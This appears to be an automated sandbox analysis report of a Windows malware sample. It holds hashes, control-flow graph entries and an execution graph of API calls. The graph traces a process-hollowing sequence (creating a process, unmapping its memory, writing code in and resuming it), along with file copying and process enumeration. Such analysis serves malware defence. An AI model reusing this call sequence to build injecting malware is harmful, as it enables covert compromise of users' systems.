                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: e3174dcfe4e3fd00699c2672c48891575b4f79398ea8c6fdfe9a5d948a865e6e
                                                                        • Instruction ID: 0f004be268286cf4d2f6f3180cd4c929e8dc62bafcf801f0f1cf5e87c963a67c
                                                                        • Opcode Fuzzy Hash: e3174dcfe4e3fd00699c2672c48891575b4f79398ea8c6fdfe9a5d948a865e6e
                                                                        • Instruction Fuzzy Hash: 9B21D1725093C05FDB128B25DD54A92BFB4AF07324F0C84DAEC858F663D234A908CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 250 d7a486-d7a4c3 252 d7a4c5 250->252 253 d7a4c8-d7a4d4 250->253 252->253 254 d7a4d6 253->254 255 d7a4d9-d7a4f0 253->255 254->255 257 d7a527-d7a52c 255->257 258 d7a4f2-d7a505 RegSetValueExW 255->258 257->258 259 d7a507-d7a524 258->259 260 d7a52e-d7a533 258->260 260->259
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,E5CF74EA,00000000,00000000,00000000,00000000), ref: 00D7A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: ecda56e7e270158c81327b77f50755814fa084208a7d16e3089641c43f283af8
                                                                        • Instruction ID: e58cd8300f3e25775a4467b11df48dc8df04ab57b6346819dbb008d552e2539a
                                                                        • Opcode Fuzzy Hash: ecda56e7e270158c81327b77f50755814fa084208a7d16e3089641c43f283af8
                                                                        • Instruction Fuzzy Hash: BF1184B65006009FE7218F15DD49FABBBECEF44714F08C45AED498A651E375E848CA72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 272 d7a6ae-d7a6d5 273 d7a6d7 272->273 274 d7a6da-d7a6e0 272->274 273->274 275 d7a6e5-d7a6ee 274->275 276 d7a6e2 274->276 277 d7a731-d7a736 275->277 278 d7a6f0-d7a6f8 LookupPrivilegeValueW 275->278 276->275 277->278 280 d7a6fe-d7a710 278->280 281 d7a712-d7a72e 280->281 282 d7a738-d7a73d 280->282 282->281
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00D7A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 69e6692044fbe9fb66143c7358ed9798a524c929820f1e3e05f3d7b6f678d59b
                                                                        • Instruction ID: 4c26a7bb560d6c2393ef75ecef7cefc7ca47257b649c23e5e956583ffd37b0c5
                                                                        • Opcode Fuzzy Hash: 69e6692044fbe9fb66143c7358ed9798a524c929820f1e3e05f3d7b6f678d59b
                                                                        • Instruction Fuzzy Hash: DF1165756046408FEB20DF19D989B5AFBE8EF54320F1CC46ADD49CB741E274D844CA72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 284 d7a5e4-d7a62c 286 d7a62e-d7a636 FindCloseChangeNotification 284->286 287 d7a66d-d7a672 284->287 289 d7a63c-d7a64e 286->289 287->286 290 d7a674-d7a679 289->290 291 d7a650-d7a66c 289->291 290->291
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00D7A634
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 39390c1a0f0db3d80ee455689dfc99490f2935d921e47902511ef34b69efb8c7
                                                                        • Instruction ID: 5fb9a20fb664b5a5faa16109c9690fcbaa9d6783fe4cf933130428c3a0272d59
                                                                        • Opcode Fuzzy Hash: 39390c1a0f0db3d80ee455689dfc99490f2935d921e47902511ef34b69efb8c7
                                                                        • Instruction Fuzzy Hash: 5011C2715053809FDB118F25DC84B56BFE8EF46320F08C4EAED498F262D274A918CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00D7A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 8fe514485457fbc8d5da809a3aaee2746c01679fdf1cdc7a93a010590b64489f
                                                                        • Instruction ID: 5ad30cc859509b98aaad41304e9c0cecd761b93085e526f1eb41680a8dcf7b62
                                                                        • Opcode Fuzzy Hash: 8fe514485457fbc8d5da809a3aaee2746c01679fdf1cdc7a93a010590b64489f
                                                                        • Instruction Fuzzy Hash: 7301B1715006408FDB109F19D988B56FBE4EF44324F08C4AADD498BA42E374E818CF72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00D7A634
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 2bc7638e81b939e8fa7c08f2577dd1981122a96deda49e58c88d8250d937c4b9
                                                                        • Instruction ID: 8805ead25f7202fb3dd4b373b5bebd0a747bff89a02acf42381532bdfd1411c5
                                                                        • Opcode Fuzzy Hash: 2bc7638e81b939e8fa7c08f2577dd1981122a96deda49e58c88d8250d937c4b9
                                                                        • Instruction Fuzzy Hash: BB01D4755006008FDB108F19D988769FBD4EF44320F0CC4AADD498B752E274D808CE72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1855643584.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_fa0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d4354ee40f85fcf80d69b234fb5dba483e1e20b6baf4c6cb049423a144b23153
                                                                        • Instruction ID: 64292902b173132940be2d6692764ed3673d0608aac05badf1f7b5b736ca8015
                                                                        • Opcode Fuzzy Hash: d4354ee40f85fcf80d69b234fb5dba483e1e20b6baf4c6cb049423a144b23153
                                                                        • Instruction Fuzzy Hash: 864134306162468FC704FF39E79948977B2AB8520C7848829D4449FF6EFFB85909CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1855643584.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_fa0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 43bc202fb2228e7f0c05a86fd5be0ad25b9c9f9c3bb3ccc95e6a9235fa6d60a3
                                                                        • Instruction ID: bac8d066c5542cc8136811585d00f6fbd17b724c25fd783fdb23c789dd4f7965
                                                                        • Opcode Fuzzy Hash: 43bc202fb2228e7f0c05a86fd5be0ad25b9c9f9c3bb3ccc95e6a9235fa6d60a3
                                                                        • Instruction Fuzzy Hash: 26018C2470D3C04FC317677898799697F669B8325570984EFD4849B3E3CA78484AC7B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1855643584.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_fa0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1f94fcfca36f667fca8473090b55b637dc94dc2a1496d7ebac7e07ffb95421af
                                                                        • Instruction ID: 9a5e95cd3313d3841d8b2998c484e0c10c730c8030adaca316fad50f6108d810
                                                                        • Opcode Fuzzy Hash: 1f94fcfca36f667fca8473090b55b637dc94dc2a1496d7ebac7e07ffb95421af
                                                                        • Instruction Fuzzy Hash: 2501D86450E7C29FCB8347708CB94557FB0AD0B22136A44CBC8C5CB1B3DA69181EEB23
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1826006002.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_ef0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 97283ead9be362dafaae76912a3c585d1c6e704ff1016e5d9cef6f31d7872202
                                                                        • Instruction ID: a03940f0a10c28cc83c2ec4099f9a867080278b934737e50f820112a4ef5127b
                                                                        • Opcode Fuzzy Hash: 97283ead9be362dafaae76912a3c585d1c6e704ff1016e5d9cef6f31d7872202
                                                                        • Instruction Fuzzy Hash: 3AF086B65093845FDB118B069C44862FFE8EB86630709C49BEC4987652D265A908CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1826006002.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_ef0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eed34f211aa0f711c99aef9252b61593ac6f18f54ef70afb90e82e1b2732ce8a
                                                                        • Instruction ID: be901f2c047fa78dbcd6350a94c2ab8ca9eb660351241c330f6461bfed2d3735
                                                                        • Opcode Fuzzy Hash: eed34f211aa0f711c99aef9252b61593ac6f18f54ef70afb90e82e1b2732ce8a
                                                                        • Instruction Fuzzy Hash: 7BE092B66006044B9A50DF0AEC85862FBD8EB88630B08C47FDC0D8B701E276B508CEB5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821649206.0000000000D72000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D72000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d72000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bbd3d7fee9f49f916143e55c0a9b933236e1f16dc0d041aa4a94df569bb80c19
                                                                        • Instruction ID: ea729a0a05d5c33efa4da76786edf54170ddef18acdaf880bc56cef80e271f18
                                                                        • Opcode Fuzzy Hash: bbd3d7fee9f49f916143e55c0a9b933236e1f16dc0d041aa4a94df569bb80c19
                                                                        • Instruction Fuzzy Hash: 34D02E3A2006C08FD3128A0CC2A9FA537D4AB60708F0A80F9A8008B763C728D880C210
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821649206.0000000000D72000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D72000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d72000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50cbe89175cca3377bf46c92651888ae3fd4b9a5d8649619cae4477dcfe39ed1
                                                                        • Instruction ID: a1b50d3ecb7536c3bc73f8abaaddd399341ec2b0e09912b215e433192e32f534
                                                                        • Opcode Fuzzy Hash: 50cbe89175cca3377bf46c92651888ae3fd4b9a5d8649619cae4477dcfe39ed1
                                                                        • Instruction Fuzzy Hash: 59D05E342006C14BCB15DA1CD2D8F6937D4AB44724F0A84ECAC108B762C7A8D8C0DA10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:17.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:1160
                                                                        Total number of Limit Nodes:13
                                                                        execution_graph 2340 40a280 2353 405a10 2340->2353 2342 40a2a7 2343 405a10 104 API calls 2342->2343 2344 40a2b0 SendMessageA SendMessageA GetWindowRect 2343->2344 2480 4052c0 CopyRect 2344->2480 2346 40a30b _ftol 2347 40afbe 2346->2347 2348 40a342 GetWindowRect 2347->2348 2349 40a359 2348->2349 2481 405300 CopyRect 2349->2481 2352 40a38c 2552 40b0e0 2353->2552 2356 407516 LoadLibraryA 2358 407568 LoadLibraryA 2356->2358 2360 407652 LoadLibraryA 2358->2360 2361 40766b LoadLibraryA 2360->2361 2362 407681 LoadLibraryA 2361->2362 2363 407694 LoadLibraryA 2362->2363 2364 4076a4 LoadLibraryA 2363->2364 2365 4076ba LoadLibraryA 2364->2365 2366 4076ca LoadLibraryA 2365->2366 2367 4076da LoadLibraryA 2366->2367 2368 4076ea LoadLibraryA 2367->2368 2370 4077b1 LoadLibraryA 2368->2370 2371 4077c1 LoadLibraryA 2370->2371 2372 4077d1 LoadLibraryA 2371->2372 2373 4077e7 LoadLibraryA 2372->2373 2374 4077fd LoadLibraryA 2373->2374 2375 407813 LoadLibraryA 2374->2375 2376 407829 LoadLibraryA 2375->2376 2377 40783f LoadLibraryA 2376->2377 2378 40784f LoadLibraryA 2377->2378 2379 407865 LoadLibraryA 2378->2379 2380 40787b LoadLibraryA 2379->2380 2382 407a48 2380->2382 2383 407ad3 GetModuleFileNameW 2382->2383 2385 408afd 2382->2385 2393 408e4b 2382->2393 2384 407b09 wcscpy 2383->2384 2404 407b25 wcscpy wcscat wcscpy wcscat wcscat 2383->2404 2384->2404 2387 408c26 CreateFileW 2385->2387 2388 408cf7 2385->2388 2435 408b16 2385->2435 2387->2393 2396 408c78 CreateFileW 2387->2396 2390 408d00 CreateToolhelp32Snapshot 2388->2390 2399 408e47 2388->2399 2392 408d9c Process32First 2390->2392 2390->2393 2391 408158 CreateProcessW 2395 40818d Wow64GetThreadContext NtReadVirtualMemory NtUnmapViewOfSection NtUnmapViewOfSection 2391->2395 2441 408225 2391->2441 2405 408de6 Process32Next 2392->2405 2406 408e2d FindCloseChangeNotification 2392->2406 2393->2342 2398 4081f7 NtUnmapViewOfSection NtUnmapViewOfSection 2395->2398 2396->2393 2397 408c99 CreateFileW 2396->2397 2397->2393 2400 408cbc CreateFileW 2397->2400 2398->2441 2399->2393 2407 408f3a CreateFileA 2399->2407 2400->2393 2403 408cdd FindCloseChangeNotification 2400->2403 2402 408272 VirtualAllocEx 2402->2441 2411 408ce7 2403->2411 2404->2391 2405->2406 2408 408df7 strstr 2405->2408 2406->2342 2407->2393 2410 408fc7 CreateFileA 2407->2410 2412 408e3a 2408->2412 2413 408e0b strstr 2408->2413 2409 4082d8 VirtualAllocEx WriteProcessMemory WriteProcessMemory 2409->2441 2410->2393 2415 408fe9 CreateFileW 2410->2415 2411->2342 2412->2342 2413->2412 2416 408e1f 2413->2416 2414 4082b6 VirtualAllocEx 2414->2441 2424 40903b wcslen CreateFileW 2415->2424 2416->2406 2416->2408 2417 408327 WriteProcessMemory 2417->2417 2417->2441 2418 4083da WriteProcessMemory Wow64SetThreadContext GetPEB 2421 40844e WriteProcessMemory ResumeThread Wow64SuspendThread WriteProcessMemory 2418->2421 2418->2441 2420 40838c WriteProcessMemory 2420->2418 2420->2420 2421->2441 2422 4084c1 wcscpy wcscat MoveFileExW CopyFileW 2425 4087f8 ResumeThread 2422->2425 2422->2441 2423 4089af ResumeThread 2423->2441 2426 409077 wcscat CreateFileW 2424->2426 2425->2441 2431 409111 2426->2431 2432 40911a VirtualAlloc 2426->2432 2427 408a4d wcscat 2430 408a77 wcsstr 2427->2430 2429 408813 Sleep CreateToolhelp32Snapshot Module32First 2429->2441 2433 408a8f CreateFileW 2430->2433 2430->2441 2431->2432 2436 409148 ReadFile 2432->2436 2433->2441 2434 408900 Wow64SuspendThread 2434->2441 2435->2342 2445 40915c FindCloseChangeNotification 2436->2445 2437 4088c8 strstr 2437->2441 2442 40891b Wow64SuspendThread FindCloseChangeNotification DeleteFileW 2437->2442 2438 408945 ResumeThread Sleep DeleteFileW 2440 408977 Wow64SuspendThread 2438->2440 2438->2441 2439 408ad8 TerminateProcess 2439->2441 2444 408988 Sleep MoveFileExW 2440->2444 2441->2385 2441->2391 2441->2402 2441->2409 2441->2414 2441->2417 2441->2418 2441->2420 2441->2422 2441->2423 2441->2425 2441->2427 2441->2429 2441->2434 2441->2437 2441->2438 2441->2439 2441->2444 2442->2441 2444->2423 2444->2441 2447 4091c3 VirtualAlloc 2445->2447 2449 4092a3 2447->2449 2448 409b8a 2450 405a10 ExitProcess 2448->2450 2449->2448 2451 409409 2449->2451 2454 405a10 ExitProcess 2449->2454 2452 409bd6 2450->2452 2455 409428 2451->2455 2460 405a10 ExitProcess 2451->2460 2453 409be6 2452->2453 2456 405a10 ExitProcess 2452->2456 2457 409c07 2453->2457 2458 409c1e 2453->2458 2459 4093fd 2454->2459 2466 405a10 ExitProcess 2455->2466 2478 40949e 2455->2478 2456->2453 2461 405a10 ExitProcess 2457->2461 2463 409c27 2458->2463 2464 409c3e 2458->2464 2459->2451 2462 409404 2459->2462 2465 40941c 2460->2465 2470 409c12 2461->2470 2554 405a00 ExitProcess 2462->2554 2472 405a10 ExitProcess 2463->2472 2468 405a10 ExitProcess 2464->2468 2465->2455 2467 409423 2465->2467 2469 40945b 2466->2469 2555 405a00 ExitProcess 2467->2555 2468->2393 2476 405a10 ExitProcess 2469->2476 2469->2478 2470->2342 2473 409c32 2472->2473 2473->2342 2475 409a05 2475->2448 2477 405a10 ExitProcess 2475->2477 2476->2478 2477->2448 2478->2475 2479 40996b CreateProcessA Sleep TerminateProcess 2478->2479 2479->2475 2480->2346 2556 403e10 2481->2556 2483 405331 CopyRect 2484 403e10 7 API calls 2483->2484 2485 405351 CopyRect 2484->2485 2486 403e10 7 API calls 2485->2486 2487 405371 CopyRect 2486->2487 2488 403e10 7 API calls 2487->2488 2489 405391 CopyRect 2488->2489 2490 403e10 7 API calls 2489->2490 2491 4053b1 CopyRect 2490->2491 2492 403e10 7 API calls 2491->2492 2493 4053d1 CopyRect 2492->2493 2494 403e10 7 API calls 2493->2494 2495 4053f1 CopyRect 2494->2495 2496 403e10 7 API calls 2495->2496 2497 405411 CopyRect 2496->2497 2498 403e10 7 API calls 2497->2498 2499 405431 CopyRect 2498->2499 2500 403e10 7 API calls 2499->2500 2501 405451 CopyRect 2500->2501 2502 403e10 7 API calls 2501->2502 2503 405471 CopyRect 2502->2503 2504 403e10 7 API calls 2503->2504 2505 405491 CopyRect 2504->2505 2506 403e10 7 API calls 2505->2506 2507 4054b1 CopyRect 2506->2507 2508 403e10 7 API calls 2507->2508 2509 4054d1 CopyRect 2508->2509 2510 403e10 7 API calls 2509->2510 2511 4054f1 CopyRect 2510->2511 2512 403e10 7 API calls 2511->2512 2513 405511 CopyRect 2512->2513 2514 403e10 7 API calls 2513->2514 2515 405531 CopyRect 2514->2515 2516 403e10 7 API calls 2515->2516 2517 405551 CopyRect 2516->2517 2518 403e10 7 API calls 2517->2518 2519 405571 CopyRect 2518->2519 2520 403e10 7 API calls 2519->2520 2521 405591 CopyRect 2520->2521 2522 403e10 7 API calls 2521->2522 2523 4055b1 CopyRect 2522->2523 2524 403e10 7 API calls 2523->2524 2525 4055d1 CopyRect 2524->2525 2526 403e10 7 API calls 2525->2526 2527 4055f1 CopyRect 2526->2527 2528 403e10 7 API calls 2527->2528 2529 405611 CopyRect 2528->2529 2530 403e10 7 API calls 2529->2530 2531 405631 CopyRect 2530->2531 2532 403e10 7 API calls 2531->2532 2533 405651 CopyRect 2532->2533 2534 403e10 7 API calls 2533->2534 2535 405671 CopyRect 2534->2535 2536 403e10 7 API calls 2535->2536 2537 405691 CopyRect 2536->2537 2538 403e10 7 API calls 2537->2538 2539 4056b1 CopyRect 2538->2539 2540 403e10 7 API calls 2539->2540 2541 4056d1 CopyRect 2540->2541 2542 403e10 7 API calls 2541->2542 2543 4056f1 CopyRect 2542->2543 2544 403e10 7 API calls 2543->2544 2545 405711 CopyRect 2544->2545 2546 403e10 7 API calls 2545->2546 2547 405731 CopyRect 2546->2547 2548 403e10 7 API calls 2547->2548 2549 405751 CopyRect 2548->2549 2550 403e10 7 API calls 2549->2550 2551 405771 SetWindowRgn 2550->2551 2551->2352 2553 405a1d LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 2552->2553 2553->2356 2560 403e3a 2556->2560 2557 403fcd 2558 40404a CreatePolygonRgn 2557->2558 2559 403fdf CreatePolygonRgn 2557->2559 2566 404058 2558->2566 2561 403fef 2559->2561 2560->2557 2562 403f74 _ftol _ftol 2560->2562 2563 403ffa CombineRgn CreatePolygonRgn 2561->2563 2562->2557 2562->2562 2564 40ae02 2563->2564 2565 40401e CombineRgn 2564->2565 2565->2566 2566->2483 2956 40aac0 GetClientRect 2960 404ec0 CopyRect 2956->2960 2958 40ab29 LoadCursorA SetCursor 2959 40aae6 2959->2958 3039 403c20 2960->3039 2962 404ef1 2963 404f06 CopyRect 2962->2963 2964 404ef8 2962->2964 2965 403c20 4 API calls 2963->2965 2964->2959 2966 404f23 2965->2966 2967 404f38 CopyRect 2966->2967 2968 404f2a 2966->2968 2969 403c20 4 API calls 2967->2969 2968->2959 2970 404f55 2969->2970 2971 404f6a CopyRect 2970->2971 2972 404f5c 2970->2972 2973 403c20 4 API calls 2971->2973 2972->2959 2974 404f87 2973->2974 2975 404f9c CopyRect 2974->2975 2976 404f8e 2974->2976 2977 403c20 4 API calls 2975->2977 2976->2959 2978 404fb9 2977->2978 2979 404fc0 2978->2979 2980 404fce CopyRect 2978->2980 2979->2959 2981 403c20 4 API calls 2980->2981 2982 404feb 2981->2982 2983 405000 CopyRect 2982->2983 2984 404ff2 2982->2984 2985 403c20 4 API calls 2983->2985 2984->2959 2986 40501d 2985->2986 2987 405032 CopyRect 2986->2987 2988 405024 2986->2988 2989 403c20 4 API calls 2987->2989 2988->2959 2990 40504f 2989->2990 2991 405064 CopyRect 2990->2991 2992 405056 2990->2992 2993 403c20 4 API calls 2991->2993 2992->2959 2994 405081 2993->2994 2995 405096 CopyRect 2994->2995 2996 405088 2994->2996 2997 403c20 4 API calls 2995->2997 2996->2959 2998 4050b3 2997->2998 2999 4050c8 CopyRect 2998->2999 3000 4050ba 2998->3000 3001 403c20 4 API calls 2999->3001 3000->2959 3002 4050e5 3001->3002 3003 4050fa CopyRect 3002->3003 3004 4050ec 3002->3004 3005 403c20 4 API calls 3003->3005 3004->2959 3006 405117 3005->3006 3007 40512c CopyRect 3006->3007 3008 40511e 3006->3008 3009 403c20 4 API calls 3007->3009 3008->2959 3010 405149 3009->3010 3011 405150 3010->3011 3012 40515e CopyRect 3010->3012 3011->2959 3013 403c20 4 API calls 3012->3013 3014 40517b 3013->3014 3015 405190 CopyRect 3014->3015 3016 405182 3014->3016 3017 403c20 4 API calls 3015->3017 3016->2959 3018 4051ad 3017->3018 3019 4051c2 CopyRect 3018->3019 3020 4051b4 3018->3020 3021 403c20 4 API calls 3019->3021 3020->2959 3022 4051df 3021->3022 3023 4051f4 CopyRect 3022->3023 3024 4051e6 3022->3024 3025 403c20 4 API calls 3023->3025 3024->2959 3026 405211 3025->3026 3027 405226 CopyRect 3026->3027 3028 405218 3026->3028 3029 403c20 4 API calls 3027->3029 3028->2959 3030 405243 3029->3030 3031 405258 CopyRect 3030->3031 3032 40524a 3030->3032 3033 403c20 4 API calls 3031->3033 3032->2959 3034 405275 3033->3034 3035 40528a CopyRect 3034->3035 3036 40527c 3034->3036 3037 403c20 4 API calls 3035->3037 3036->2959 3038 4052a7 3037->3038 3038->2959 3042 403d04 3039->3042 3040 403d94 CreatePolygonRgn 3041 403dad 3040->3041 3043 403db1 PtInRegion 3041->3043 3046 403dca 3041->3046 3042->3040 3044 403d37 _ftol _ftol 3042->3044 3043->3046 3044->3044 3045 403d90 3044->3045 3045->3040 3046->2962 3055 40ac80 ExtTextOutA 3056 409c80 3065 401000 CopyRect 3056->3065 3058 409cf3 _ftol _ftol _ftol 3059 40afbe 3058->3059 3060 409d7d GetWindowRect 3059->3060 3061 409d98 3060->3061 3066 402500 CopyRect 3061->3066 3064 409dd5 3065->3058 3067 403e10 7 API calls 3066->3067 3068 402531 CopyRect 3067->3068 3397 404850 3068->3397 3070 402551 CopyRect 3071 403e10 7 API calls 3070->3071 3072 402571 CopyRect 3071->3072 3398 404850 3072->3398 3074 402591 CopyRect 3075 403e10 7 API calls 3074->3075 3076 4025b1 CopyRect 3075->3076 3399 404850 3076->3399 3078 4025d1 CopyRect 3079 403e10 7 API calls 3078->3079 3080 4025f1 CopyRect 3079->3080 3400 404850 3080->3400 3082 402611 CopyRect 3083 403e10 7 API calls 3082->3083 3084 402631 CopyRect 3083->3084 3401 404850 3084->3401 3086 402651 CopyRect 3087 403e10 7 API calls 3086->3087 3088 402671 CopyRect 3087->3088 3402 404850 3088->3402 3090 402691 CopyRect 3091 403e10 7 API calls 3090->3091 3092 4026b1 CopyRect 3091->3092 3403 404850 3092->3403 3094 4026d1 CopyRect 3095 403e10 7 API calls 3094->3095 3096 4026f1 CopyRect 3095->3096 3404 404850 3096->3404 3098 402711 CopyRect 3099 403e10 7 API calls 3098->3099 3100 402731 CopyRect 3099->3100 3405 404850 3100->3405 3102 402751 CopyRect 3103 403e10 7 API calls 3102->3103 3104 402771 CopyRect 3103->3104 3406 404850 3104->3406 3106 402791 CopyRect 3107 403e10 7 API calls 3106->3107 3108 4027b1 CopyRect 3107->3108 3407 404850 3108->3407 3110 4027d1 CopyRect 3111 403e10 7 API calls 3110->3111 3112 4027f1 CopyRect 3111->3112 3408 404850 3112->3408 3114 402811 CopyRect 3115 403e10 7 API calls 3114->3115 3116 402831 CopyRect 3115->3116 3409 404850 3116->3409 3118 402851 CopyRect 3119 403e10 7 API calls 3118->3119 3120 402871 CopyRect 3119->3120 3410 404850 3120->3410 3122 402891 CopyRect 3123 403e10 7 API calls 3122->3123 3124 4028b1 CopyRect 3123->3124 3411 404850 3124->3411 3126 4028d1 CopyRect 3127 403e10 7 API calls 3126->3127 3128 4028f1 CopyRect 3127->3128 3412 404850 3128->3412 3130 402911 CopyRect 3131 403e10 7 API calls 3130->3131 3132 402931 CopyRect 3131->3132 3413 404850 3132->3413 3134 402951 CopyRect 3135 403e10 7 API calls 3134->3135 3136 402971 CopyRect 3135->3136 3414 404850 3136->3414 3138 402991 CopyRect 3139 403e10 7 API calls 3138->3139 3140 4029b1 CopyRect 3139->3140 3415 404850 3140->3415 3142 4029d1 CopyRect 3143 403e10 7 API calls 3142->3143 3144 4029f1 CopyRect 3143->3144 3416 404850 3144->3416 3146 402a11 CopyRect 3147 403e10 7 API calls 3146->3147 3148 402a31 CopyRect 3147->3148 3417 404850 3148->3417 3150 402a51 CopyRect 3151 403e10 7 API calls 3150->3151 3152 402a71 CopyRect 3151->3152 3418 404850 3152->3418 3154 402a91 CopyRect 3155 403e10 7 API calls 3154->3155 3156 402ab1 CopyRect 3155->3156 3419 404850 3156->3419 3158 402ad1 CopyRect 3159 403e10 7 API calls 3158->3159 3160 402af1 CopyRect 3159->3160 3420 404850 3160->3420 3162 402b11 CopyRect 3163 403e10 7 API calls 3162->3163 3164 402b31 CopyRect 3163->3164 3421 404850 3164->3421 3166 402b51 CopyRect 3167 403e10 7 API calls 3166->3167 3168 402b71 CopyRect 3167->3168 3422 404850 3168->3422 3170 402b91 CopyRect 3171 403e10 7 API calls 3170->3171 3172 402bb1 CopyRect 3171->3172 3423 404850 3172->3423 3174 402bd1 CopyRect 3175 403e10 7 API calls 3174->3175 3176 402bf1 CopyRect 3175->3176 3424 404850 3176->3424 3178 402c11 CopyRect 3179 403e10 7 API calls 3178->3179 3180 402c31 CopyRect 3179->3180 3425 404850 3180->3425 3182 402c51 CopyRect 3183 403e10 7 API calls 3182->3183 3184 